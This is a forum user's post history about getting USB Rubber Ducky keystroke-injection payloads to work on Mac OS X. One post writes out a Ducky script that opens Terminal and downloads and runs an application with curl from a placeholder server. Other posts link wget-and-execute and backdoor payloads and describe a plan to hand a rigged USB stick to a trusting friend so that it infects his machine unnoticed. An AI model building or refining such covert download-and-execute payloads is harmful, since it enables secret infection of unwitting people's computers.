ilikepineapple

Everything posted by ilikepineapple

  1. Update: Tried it on a Mac OS X (not a mounted version) and the commands seemed to be working perfectly, all my bad! The only problem is that it was in Canadian French, therefore the layout must be different, as in the / key is replaced by the é key. How to fix that? Making another keyboard layout only for Canadian French keyboards?
  2. Oh, and second question: does anyone know why the commands/GUI aren't the same in these payloads meant for the same OS?

     https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Payload---OS-X-Wget-and-Execute
     https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Payload----OSX-User-Backdoor

     I tried both, but the COMMAND function seemed like the one actually working on my VMs for some reason, and if manually typing Terminal in, it would be able to access it and write the rest of the payload (in total gibberish, of course). What bugs me above all is the fact that the hardest part is actually achieved, yet only the smallest technical difficulty holds me back to the point where I can absolutely not do anything at all.

     Best regards,
     -domino
  3. I've recently been installing quite a couple of virtual machines to try out my little duckies (nothing to say about the Windows scripts, they work wonders and we have plenty of feedback on that part). Yet, I need infection penetration testing on Mac OS X, and I can't seem to find much going on around the forums about that subject. All I need, basically, is an understanding of their functionalities, and when I need a sudo password (like to disable Gatekeeper) or if simply being in Terminal will bypass that for a simple app installation. I'm only looking to download and execute an application downloaded from an external website, but what bugs me the most is that I can't get past the first steps.

     I have been using Jesse Wallace (c0deous) and Patrick Mosca's help by taking parts of their code to make it work, and have been remotely changing the language used by the duckencoder 2.6.3 (or whatever version it is) to Canada French, English (US-French) and Canada English. I have also been transforming the keyboard mapping inside the virtual machine itself to make sure it fitted well with the injection, but nothing worked. Every time I started the code:

     DELAY 1000
     COMMAND SPACE

     The space command seems to be working well at least haha, it does open the top-right corner prompt.

     DELAY 800
     STRING Terminal

     Here starts the problem. Terminal comes out as something like IAELtmin; I tried making sense out of it but I really couldn't. Every language gave a different but similar output, and none was able to fix the problem.

     DELAY 500
     ENTER

     Problem number 2: Despite the weird wording, it doesn't even press Enter at this point, because I see some recommendations from Apple being highlighted, so naturally after the first fail it should keep on going for the next, yet it doesn't, which is weird.

     DELAY 500
     STRING curl http://SERVER/path/to/file.app > file.app
     ENTER
     DELAY 2000 (give it some time to download it)
     STRING open -a file
     ENTER

     And it keeps on writing without ever pressing the ENTER key, and mixing all the letters together.

     Now I've been working with iAtkos, if anyone is familiar with it, all set up well, and have worked hours and tried many different variables to make this work, but the foundations themselves don't work (even the online encoder couldn't give me a good inject.bin output on the field).

     So I was wondering if anyone has had these problems before, and if there is a way to fix it? Is it because it runs inside a VM and not a real Mac, and otherwise it would work? Is it simply because of an encoding/payload problem?

     Also, on a side note, living in a French-Canadian area where I have no clue which language my friends have, I was wondering if the Canadian keyboard was unilateral, same for everyone, and if, whether they are writing in English or French, the payload should work anyway (all with Canadian keyboards, all QWERTY, simply Ctrl+Shift changes the key mapping from French to English).

     Anyway, I'll be glad to hear from you guys soon, you seem like a great community, and this product is amazing as far as I tested it on Windows.

     Thanks in advance!
     -domino
  4. Hello, I have just received my first duckies and started playing around with them, and I gotta admit it is pretty fun. I have also found a great interest in the wget + execute function, especially if something can be worked out to do the same for .app on Mac OS X (if someone could help me out with that it'd help, I don't have any Mac to help me find out which keys would allow me to remote download + execute). But most importantly, what's bothering me is the lack of stealthiness of the actions.

     ***
     Bob tells his friend he needs a certain doc.
     Adam answers him: sure, let me put it on my USB and let me hand it to you.
     Adam quickly makes a payload (pre-written and probably pre-compiled too) and puts it inside the SD card.
     Adam tells him: hey, here's the file!
     Bob inserts the rubber ducky.
     Bob only sees a couple of things popping up by themselves on the screen, but never ends up with the actual file he's looking for.
     ***

     This is a payload for social engineering 2.0 that I'm looking for, as, for now, the only ones available can remotely download and execute files, or fuck up the OS it's on, but anyone looking at the screen while the USB key is plugged in will still see something fishy going on, especially if nothing happens afterwards.

     THEREFORE (getting to the point), I'd like to know if a payload exists, or if it is even possible to actually mount the SD card that is inside the emulator so that we get a double entry, one of an emulator, and the other one of a storage unit, that would allow the opening of a new folder that would appear as an external drive to the user, and where we could put whatever .doc or .pdf is needed to be transferred? Such a method would allow stealth targeted infection and much less social engineering and "hoping" that someone just picks up a random USB key and plugs it in to see what happens.

     Also, the success rate would be much bigger, since you'd be standing right by the person inserting it and he would trust you, since after the little payload of wget and execute is loaded, a window showing a mounted external drive with the requested files appears (any non-IT guy would then assume that whatever happened beforehand was just to mount the card/storage).

     The idea has been brought to me of creating a folder in %temp% and naming it USB KEY, where we would download the file to and afterwards open it, but it still seems fishy in case the internet connection isn't quite good, and simply because of the location of the "drive", and, MOST OF ALL, because there actually IS an SD card that should be available to be mounted somehow.

     I have read through a lot of forums and guides and yet couldn't find a payload or any hints as to how to make the emulator recognize the SD card it's using as a drive that's browsable, and put some files inside that could be used by whoever plugs in the key. If anyone could help me out with that, this would bring the ducky's power to a brand new level.

     Thanks in advance,
     -pineapple